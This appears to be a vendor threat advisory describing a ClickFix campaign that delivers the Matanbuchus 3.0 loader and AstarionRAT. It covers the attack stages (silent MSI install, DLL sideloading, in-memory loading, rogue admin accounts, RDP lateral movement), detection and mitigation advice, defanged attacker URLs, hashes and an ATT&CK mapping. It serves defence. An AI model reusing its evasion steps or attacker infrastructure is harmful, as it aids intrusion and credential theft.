Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
First observed in February 2026, a sophisticated ClickFix social engineering campaign is actively targeting Windows users worldwide, tricking victims into unknowingly executing a silent MSI installation that delivers Matanbuchus 3.0 — a premium Malware-as-a-Service (MaaS) loader available for rent at up to $15,000 per month. Once the Matanbuchus 3.0 loader is deployed, it installs AstarionRAT, a newly identified remote access trojan (RAT) capable of credential theft, SOCKS5 proxying, network port scanning, and reflective payload loading. All command-and-control (C2) communications between AstarionRAT and its operators are protected through RSA encryption, making this Matanbuchus ClickFix attack campaign a significant and highly evasive threat to enterprise environments globally.
Stage 1 – ClickFix Social Engineering via Malicious MSI Installation The Matanbuchus 3.0 campaign resurfaces after a brief hiatus in May 2025, now weaponizing ClickFix social engineering prompts to lure victims into pasting malicious commands into the Windows Run dialog. These commands use mixed-case formatting and obscured download paths to evade basic detection, retrieving a malicious installer from newly registered domains impersonating legitimate cloud services. Upon execution, the package drops files into AppData directories disguised as security software vendor folders and uses a renamed 7-Zip utility to unpack a password-protected archive containing the next-stage payload.
Stage 2 – DLL Sideloading and Matanbuchus 3.0 Loader Execution The infection escalates through DLL sideloading, abusing legitimate antivirus components to execute malicious code under the cover of trusted software. A genuine executable is paired with a malicious DLL functioning as the Matanbuchus 3.0 loader. The loader is heavily obfuscated with binary padding, fake logic branches, and meaningless API calls designed to frustrate sandbox analysis. It decrypts embedded payloads using ChaCha20 encryption and reconstructs shellcode that bypasses monitoring controls before pulling the next module from attacker-controlled infrastructure.
Stage 3 – Java-Based Sideloading and In-Memory Reflective Loading A second sideloading phase leverages legitimate Java components alongside a malicious library and an encrypted Lua script. The malware restores clean versions of key system libraries to neutralize security hooks, then launches an embedded Lua interpreter to decode large volumes of encoded data into executable shellcode. This shellcode acts as a reflective loader, rebuilding compressed components entirely in memory to deliver the final payload, AstarionRAT, while minimizing on-disk forensic artifacts.
Stage 4 – AstarionRAT Remote Access Trojan Deployment AstarionRAT provides operators with full remote access capabilities including file and process manipulation, credential theft, command execution, network port scanning, SOCKS5 traffic proxying, and dynamic code loading. Its C2 communications are disguised as normal application telemetry to blend in with legitimate network activity. Persistence is established through scheduled tasks, and attackers returned approximately 17 hours after the initial compromise to begin manual hands-on operations.
Stage 5 – Lateral Movement, Rogue Account Creation, and Domain Expansion During the hands-on phase, attackers conducted domain reconnaissance, staged tools in folders mimicking legitimate Windows update paths, and used a compromised service account to move laterally via RDP. Rogue administrator accounts were created and tooling was deployed across multiple servers, including a backup domain controller, effectively replicating access across the environment. While security defenses eventually quarantined portions of the attack chain, the operators retained persistence through newly created accounts until activity was ultimately contained.
Train Users to Recognize ClickFix Prompts: Educate employees to identify and refuse prompts instructing them to copy and paste commands into Run dialogs or terminal windows. Users should understand the significant risks of executing unknown commands from web-based instructions — a hallmark of the ClickFix social engineering technique.
Disable the Windows Run Dialog via Group Policy: Use Group Policy to disable the Run dialog box (Win + R) and remove the Run option from the Start Menu via User Configuration > Administrative Templates > Start Menu and Taskbar to eliminate this key ClickFix execution path used by Matanbuchus 3.0.
Configure Terminal Paste Warnings: Set Windows Terminal to warn users when pasted text contains multiple lines, adding a critical speed bump before multi-line command execution that may indicate an active ClickFix social engineering attempt.
Monitor msiexec Execution with Suspicious Parameters: Configure endpoint detection rules to flag msiexec commands containing mixed-case characters, URLs with path traversal sequences, or the /q silent installation flag — especially when initiated from user-accessible contexts such as the Windows Run dialog.
Block Newly Registered Domains: Implement DNS filtering or proxy rules to block or flag connections to domains registered within the past 30 days. The ClickFix delivery infrastructure in this Matanbuchus campaign relied on domains created only days before the attack was launched.
Monitor Rogue Account Creation: Alert on net user and net localgroup commands adding unfamiliar accounts, especially when executed via PsExec or remote services, and flag accounts being added to Administrator groups in both English and localized variants (e.g., Administradores).
Implement Network Segmentation for Domain Controllers: Restrict direct RDP and PsExec access to domain controllers, requiring jump servers or privileged access workstations with multi-factor authentication to slow lateral movement toward these critical assets.
URLs: hxxp[:]//binclloudapp[.]com/466943 hxxps[:]//marle[.]io/check/updprofile[.]aspx
Domain: www[.]ndibstersoft[.]com
File Paths: /intake/organizations/events?channel=app, %APPDATA%\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU, %APPDATA%\DocuRay Technologies S.r.l\DocuRay PDF Professional\ZAVY, %APPDATA%\HelixShield Technologies ApS\HelixShield Adaptive Security\APS\ZAV, %LOCALAPPDATA%\Temp\ndvyxgdriggmarrf\
SHA256 Hashes: de81e2155d797ff729ed3112fd271aa2728e75fc71b023d0d9bb0f62663f33b3 6ffae128e0dbf14c00e35d9ca17c9d6c81743d1fc5f8dd4272a03c66ecc1ad1f 68858d3cbc9b8abaed14e85fc9825bc4fffc54e8f36e96ddda09e853a47e3e31 03c624d251e9143e1c8d90ba9b7fa1f2c5dc041507fd0955bdd4048a0967a829 8e54cd12591d67dfbe72e94c1bde6059e1cba157e6786aec63f8f9e3c71fb925 c31c8edbf94c85cc9bc46a5665c45a3556c48d5ad615c0a44e14e5406d80df12 eecc83add16f3d513a9701e9a646b1885014229ac6f86addd6b10afb64d1d2af ea378496135318ac5ad667a032fa4a9686add9d27fe4a7c549c937611b5099e5
| Tactic | Technique | Sub-Technique |
|---|---|---|
| Execution | T1204: User Execution | T1204.002: Malicious File / T1204.004: Malicious Copy and Paste |
| Execution | T1059: Command and Scripting Interpreter | T1059.003: Windows Command Shell |
| Execution | T1218: System Binary Proxy Execution | T1218.007: Msiexec |
| Execution | T1106: Native API | — |
| Persistence | T1053: Scheduled Task/Job | T1053.005: Scheduled Task |
| Persistence | T1136: Create Account | T1136.001: Local Account |
| Privilege Escalation | T1078: Valid Accounts | T1078.003: Local Accounts |
| Defense Evasion | T1574: Hijack Execution Flow | T1574.001: DLL |
| Defense Evasion | T1027: Obfuscated Files or Information | T1027.001: Binary Padding / T1027.013: Encrypted/Encoded File |
| Defense Evasion | T1562: Impair Defenses | T1562.001: Disable or Modify Tools |
| Defense Evasion | T1036: Masquerading | T1036.005: Match Legitimate Name or Location |
| Defense Evasion | T1620: Reflective Code Loading | — |
| Discovery | T1069: Permission Groups Discovery | T1069.002: Domain Groups |
| Discovery | T1018: Remote System Discovery | — |
| Lateral Movement | T1021: Remote Services | T1021.001: Remote Desktop Protocol |
| Lateral Movement | T1570: Lateral Tool Transfer | — |
| Lateral Movement | T1569: System Services | T1569.002: Service Execution |
| Command and Control | T1071: Application Layer Protocol | T1071.001: Web Protocols |
| Command and Control | T1573: Encrypted Channel | T1573.002: Asymmetric Cryptography |
| Command and Control | T1090: Proxy | T1090.001: Internal Proxy |
| Command and Control | T1132: Data Encoding | T1132.002: Non-Standard Encoding |
Get through updates and upcoming events, and more directly in your inbox